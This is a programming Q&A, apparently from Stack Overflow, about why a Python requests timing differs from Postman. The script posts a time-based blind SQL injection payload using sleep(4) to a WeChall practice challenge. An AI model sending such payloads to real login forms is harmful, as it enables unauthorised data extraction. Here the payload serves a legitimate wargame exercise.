# response time in python not the same as postman

Tags: python-3.x, python-requests, postman

When I execute the code below the response time is 0.4, but when I make the exact request in postman the response time is ~4, what's wrong with my code?

```
import requests

url = "https://www.wechall.net/challenge/training/mysql/auth_bypass2/index.php"

payload = {'username': 'admin\' and username like \'a%\' and sleep(4)#',
'password': '',
'login': 'Login'}

headers = {
  'Content-Type': 'multipart/form-data; boundary=--------------------------626487670766176098971255'
}

response = requests.request("POST", url, headers=headers, data = payload)

print(response.elapsed.total_seconds())
```

[image]

Answer (score 1):

According to https://kite.com/python/docs/requests.Response.elapsed, elapsed measures the time taken between sending the first byte of the request and finishing parsing the headers, and not until the full response has been transfered.

So in this case, time calculated by postman client is the response time for the api.